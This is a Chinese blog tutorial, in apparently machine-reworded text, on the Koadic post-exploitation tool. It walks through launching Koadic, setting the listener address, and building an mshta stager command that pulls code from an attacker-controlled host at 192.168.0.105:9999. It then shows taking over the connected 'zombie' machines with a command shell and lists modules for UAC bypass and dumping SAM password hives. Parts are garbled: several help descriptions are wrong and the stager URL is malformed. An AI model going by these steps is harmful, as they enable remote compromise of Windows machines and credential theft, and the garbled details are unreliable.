Koadic渗透工具了解一下
在盆友的搏客上见到强烈推荐的这款专用工具Koadic,我触碰了之后发觉很非常好这个专用工具的强劲独到之处我认为就是说得到shell后的各种各样控制模块作用,我也自个写出去发送给大伙儿看看。
最先把新项目复制到当地:
新项目详细地址
https://github.Com/zerosum0x0/koadic.git
随后压解,要是你可以安裝到你特定的文件目录就先Cd到哪个文件目录在免费下载,我就是拷贝到那了,因此我压解。给出图
后渗入专用工具Koadic
运作koadic
Cd koadic-master/ //Cd到手机软件文件目录
sudo ./koadic //用最高权限运作koadic
开启Koadic,显示信息必须设定的內容
图为指令给出
(koadic: sta/Js/mshta)# info //
查询必须设定的內容
后渗入专用工具Koadic
查询专用工具应用协助
(koadic: sta/Js/mshta)# help
后渗入专用工具Koadic
巨头绕过我的汉语翻译,英文很渣并且是全靠觉得汉语翻译的(很艰辛,靠工作经验和百度翻译蒙)
(koadic: sta/Js/mshta)# help //协助的含意
COMMAND DESCRIPTION 指令 叙述
——— ————-
load reloads all modules //显示信息
info shows the current module options//显示信息当今控制模块选择项。
use switch To a different module//转换到不一样的控制模块
get sets a variable For the current module//为当今控制模块设定1个自变量
jobs shows info about jobs//显示信息相关工作中的信息内容
help displays help info For a command//获得1个cmdshell
cmdshell command shell To interact with a zombie// 指令 shell 与丧尸互交
kill shows info about jobs//显示信息相关工作中的信息内容
listeners shows info about stagers//提示信息的传输器荷载
exit exits the program//撤出
zombies lists hooked targets//显示信息全部丧尸应用程序
run runs the current module//运作,和exploit一样
verbose exits the program//撤出程序流程
进到主题风格 ,刚开始设定。听着是否心潮澎湃要向下看过,嘿嘿。我觉得没啥要讲的,你只必须get lhost
这一指令大伙儿应当都明白,就是说设定当地ip。
给出图
后渗入专用工具Koadic
特别注意看,他转化成了1个网站地址,
我觉得它是1个故意网站地址,里边装车了exploit
最终转化成的运用指令给出
mshta .com://192.168.0.105:9999/S8QoC
运用方式是放进cmd里边实行
给出图
后渗入专用工具Koadic
我觉得你可以看他弹出来了事件查看器我不知道为何,就是我打开的啊,
也将会会好奇心mshta代表什么意思,正解给出
mshta.exe是微软公司Windows电脑操作系统有关程序流程,用以实行.HTA文档
我想要就这样运用的吧
那麼当总体目标服务器运作这一指令的那时候,人们这里就反跳回家了应用程序 应用程序Id为0
给出图
后渗入专用工具Koadic
要是是用别的拷贝大批量实行了这一指令,应用程序较为多得话能够实行zombies来查询上下应用程序,并挑选Id开展操纵
随后假如这儿想获得1个cmdshell得话,方式给出
cmdshell Id
我这儿应当是 cmdshell 0
给出图
后渗入专用工具Koadic
或许这怎能算是上功能强大的后渗入呢,这怎能考虑大伙儿呢
请相信我,上边仅仅一般实际操作,一般实际操作,说白了后渗入,在下边,
慢慢看嘛,这一后渗入专用工具最该入选的缘故我觉得有几个
1.自然环境规定不高
2.实际操作非常简单
3.出示的后渗入控制模块很好用丰富多彩
后渗入控制模块我不一个个讲了,设定都非常简单
我关键给你说一下下姓名
Hooks a zombie
Elevates integrity (UAC Bypass)
Dumps SAM/SECURITY hive For passwords
Scans local network For
相关文章
- 4条评论
- 野欢怙棘2022-06-04 05:11:00
- 电脑操作系统有关程序流程,用以实行.HTA文档我想要就这样运用的吧那麼当总体目标服务器运作这一指令的那时候,人们这里就反跳回家了应用程序 应用程序Id为0给出图后渗入专用工具
- 泪灼云胡2022-06-04 08:05:51
- 当地ip。给出图后渗入专用工具Koadic特别注意看,他转化成了1个网站地址,我觉得它是1个故意网站地址,里边装车了exploit最终转化成的运用指令给出mshta .com://192.168.0.105:9999/S8QoC运用方式是放进
- 南殷闻枯2022-06-04 12:52:35
- 相信我,上边仅仅一般实际操作,一般实际操作,说白了后渗入,在下边,慢慢看嘛,这一后渗入专用工具最该入选的缘故我觉得有几个1.自然环境规定不高2.实际操作非常简单3.出示的后渗
- 辞眸婉绾2022-06-04 10:35:06
- exits the program//撤出程序流程进到主题风格 ,刚开始设定。听着是否心潮澎湃要向下看过,嘿嘿。我觉得没啥要讲的,你只必须get lhost这一指令大伙儿应当都明白,就是说设定当地ip。给出图后渗入专用工具Koadic特